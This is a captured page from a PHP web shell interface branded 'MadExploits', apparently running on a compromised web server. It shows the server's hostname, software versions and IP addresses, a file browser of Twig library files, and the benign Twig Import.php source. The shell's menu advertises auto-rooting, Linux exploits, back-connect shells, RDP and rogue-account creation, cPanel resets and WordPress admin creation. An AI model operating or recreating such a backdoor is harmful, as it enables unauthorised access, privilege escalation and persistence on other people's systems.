Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
lib /
Twig /
Node /
[ HOME SHELL ]
Name
Size
Permission
Action
Expression
[ DIR ]
drwxr-xr-x
AutoEscape.php
827
B
-rw-r--r--
Block.php
952
B
-rw-r--r--
BlockReference.php
796
B
-rw-r--r--
Body.php
332
B
-rw-r--r--
CheckSecurity.php
2.95
KB
-rw-r--r--
Do.php
725
B
-rw-r--r--
Embed.php
1.26
KB
-rw-r--r--
Expression.php
405
B
-rw-r--r--
Flush.php
617
B
-rw-r--r--
For.php
4.12
KB
-rw-r--r--
ForLoop.php
1.47
KB
-rw-r--r--
If.php
1.6
KB
-rw-r--r--
Import.php
1.29
KB
-rw-r--r--
Include.php
2.44
KB
-rw-r--r--
Macro.php
2.88
KB
-rw-r--r--
Module.php
13.81
KB
-rw-r--r--
Print.php
815
B
-rw-r--r--
Sandbox.php
1.12
KB
-rw-r--r--
SandboxedPrint.php
1.32
KB
-rw-r--r--
Set.php
3.06
KB
-rw-r--r--
Spaceless.php
849
B
-rw-r--r--
Text.php
753
B
-rw-r--r--
With.php
1.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Import.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Represents an import node. * * @author Fabien Potencier <fabien@symfony.com> */ class Twig_Node_Import extends Twig_Node { public function __construct(Twig_Node_Expression $expr, Twig_Node_Expression $var, $lineno, $tag = null) { parent::__construct(array('expr' => $expr, 'var' => $var), array(), $lineno, $tag); } public function compile(Twig_Compiler $compiler) { $compiler ->addDebugInfo($this) ->write('') ->subcompile($this->getNode('var')) ->raw(' = ') ; if ($this->getNode('expr') instanceof Twig_Node_Expression_Name && '_self' === $this->getNode('expr')->getAttribute('name')) { $compiler->raw('$this'); } else { $compiler ->raw('$this->loadTemplate(') ->subcompile($this->getNode('expr')) ->raw(', ') ->repr($this->getTemplateName()) ->raw(', ') ->repr($this->getTemplateLine()) ->raw(')') ; } $compiler->raw(";\n"); } }
Close